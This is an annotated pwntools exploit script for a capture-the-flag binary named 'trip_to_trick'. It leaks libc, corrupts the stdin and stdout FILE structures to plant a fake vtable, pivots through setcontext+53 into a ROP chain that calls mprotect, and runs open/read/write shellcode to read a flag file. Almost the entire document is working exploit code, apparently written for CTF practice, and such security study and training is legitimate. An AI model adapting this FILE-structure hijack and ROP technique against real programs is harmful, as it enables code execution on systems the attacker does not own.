1. stdin._IO_buf_base -> stdin
2. stdin._IO_buf_base = stdout, stdin._IO_buf_end = stdout +0x2000
3. stdout.vtable = _IO_helper_table
4. _IO_helper_table.sysclose = setcontext + 53
5. rop + orw
# Exploit script for the "trip_to_trick" challenge (pwntools; Python 2 syntax —
# note the bare `print` statement below).  It follows the five-step outline
# given above the listing: redirect stdin's buffer at the stdin FILE itself,
# overwrite stdout's FILE struct (including its vtable pointer), pivot through
# setcontext+53 into a ROP chain that calls mprotect, then run open/read/write
# shellcode.  All non-symbol libc offsets are hard-coded for one specific libc
# build; they are not portable.
import sys
from pwn import *

# Usage: <script> r|l  — 'r' talks to the remote service, 'l' runs a local copy.
if len(sys.argv) != 2:
    print "sys.argv[1] = r : remote l : local"
    exit()

#context.log_level = 'debug'

if sys.argv[1].strip() == 'l':
    p = process('./trip_to_trick')
elif sys.argv[1].strip() == 'r':
    p = remote('',)  # host/port left blank in the published script

e = ELF('./trip_to_trick')
if sys.argv[1].strip() == 'l':
    l = e.libc
elif sys.argv[1].strip() == 'r':
    l = ELF('./')  # path to the target's libc left blank in the published script

pause()  # gives the author time to attach a debugger before the leak is consumed

# The challenge prints an address prefixed with "0x"; the script reads 12 hex
# digits of it and treats it as &system, deriving the libc base from that.
p.recvuntil("0x")
libc = int(p.recv(12), 16) - l.sym['system']
log.info("libc : " + hex(libc))

# ROP gadgets (hard-coded offsets for this libc build): pop rdi / pop rsi / pop rdx.
prdi = libc + 0x0000000000026542
prsi = libc + 0x0000000000026f9e
prdx = libc + 0x000000000012bda6

# Runtime addresses of the glibc FILE objects for stdin and stdout.
stdin = libc + l.sym['_IO_2_1_stdin_']
stdout = libc + l.sym['_IO_2_1_stdout_']
# Hard-coded libc offset; the outline above names it _IO_helper_table, i.e. a
# vtable that already lives inside glibc (presumably so a vtable-range check
# accepts it — not verifiable from this script alone).
helper = libc + 0x1e5960
log.info("stdout : " + hex(stdout))

# Step 1: the program apparently accepts "<address> <value>" as two hex strings.
# Here address = stdin + 0x38 and value = stdin; per the author's comment this
# makes stdin->_IO_buf_base point at the stdin FILE struct itself.
pay = hex(stdin + 0x38)[2:] + " " + hex(stdin)[2:]
p.sendline(pay) # _IO_2_1_stdin_ -> _IO_buf_base = _IO_2_1_stdin_

# Step 2: the next read into stdin now lands on the stdin FILE struct itself, so
# this payload rewrites its header: a _flags value, then pointer fields set so
# that, per the outline, _IO_buf_base = stdout and _IO_buf_end = stdout + 0x2000.
# (Which field each p64 maps to is not spelled out in the script; the 0xd8
# offset and the 0x2000 window follow the outline's step 2.)
pay = p64(0xfbad208b)
pay += p64(stdout + 0xd8)
pay += p64(stdout) * 6
pay += p64(stdout + 0x2000)
p.send(pay)

# Step 3: stdin's buffer now covers the stdout FILE struct, so the following
# bytes overwrite stdout.  Values of the form
#   0x00007f21110c.... - 0x00007f2110edf000 + libc
# are addresses captured in a debugging session minus the libc base seen in
# that session, rebased onto the leaked libc base.
pay = p64(0xfbad2887) #stdout
pay += p64(0x00007f21110c47e3 - 0x00007f2110edf000 + libc) * 7
pay += p64(0x00007f21110c47e4 - 0x00007f2110edf000 + libc)
pay += p64(0) * 4
pay += p64(0x00007f21110c3a00 - 0x00007f2110edf000 + libc)
pay += p64(1)
pay += p64(0xffffffffffffffff)
pay += p64(0)
pay += p64(0x00007f21110c6580 - 0x00007f2110edf000 + libc)
pay += p64(0xffffffffffffffff)
pay += p64(0)
pay += p64(0x00007f21110c38c0 - 0x00007f2110edf000 + libc)
pay += p64(0) * 3
pay += p64(0x00000000ffffffff)
pay += p64(0) * 2
# Last field of the stdout struct: the vtable pointer, redirected to `helper`
# (outline step 3: stdout.vtable = _IO_helper_table).
pay += p64(helper) #stdout end
log.info("HELPER : " + hex(helper))

# Bytes past the end of stdout (still inside stdin's 0x2000-byte buffer window).
# The first three restore the stderr/stdout/stdin pointers that follow the
# stdout object in memory; what lies beyond them is where the fake vtable,
# context and shellcode are placed.
pay += p64(libc + l.sym['_IO_2_1_stderr_'])
pay += p64(stdout)
pay += p64(stdin)
#pay += p64(0x00007f92dbab0e90 - 0x7f92dba8a000 + libc)

# rop payload
# Step 5 (ROP part): mprotect(helper & ~0xfff, 0x3000, 7) — makes the pages
# holding this payload RWX (7 = PROT_READ|PROT_WRITE|PROT_EXEC) so the
# shellcode below can execute in place.
rop = p64(prdi)
rop += p64(helper &~0xfff)
rop += p64(prsi)
rop += p64(0x3000)
rop += p64(prdx)
rop += p64(7)
rop += p64(libc + l.sym['mprotect'])

# shellcode
# Step 5 (orw part): open("/root/pwn/flag", 0, 0); read(fd, rsp, 0x100);
# write(1, rsp, 0x100).  `.center(0x50, '\x90')` pads both sides with NOPs.
context(arch = "amd64", os = "linux")
orw = shellcraft.pushstr("/root/pwn/flag")
orw += shellcraft.open('rsp', 0, 0)
orw += shellcraft.read('rax', 'rsp', 0x100)
orw += shellcraft.write(1, 'rsp', 0x100)
orw = asm(orw).center(0x50, '\x90')

# Layout after the stdout struct: NOP-padded shellcode (0x108 bytes), then 20
# copies of setcontext+53 acting as the fake vtable (outline step 4: any
# vtable slot invoked, e.g. sysclose, lands in setcontext+53), then a pointer
# to the ROP chain that follows (presumably consumed as the new stack pointer
# when setcontext restores registers — TODO confirm against the struct layout),
# then the chain itself and one more hard-coded libc offset whose role the
# script does not record.
pay += orw.ljust(0x108, '\x90')
pay += p64(libc + l.sym['setcontext'] + 53) * 20
pay += p64(stdout + len(pay))
pay += rop
pay += p64(libc + 0x1e5858)
p.send(pay)

p.interactive()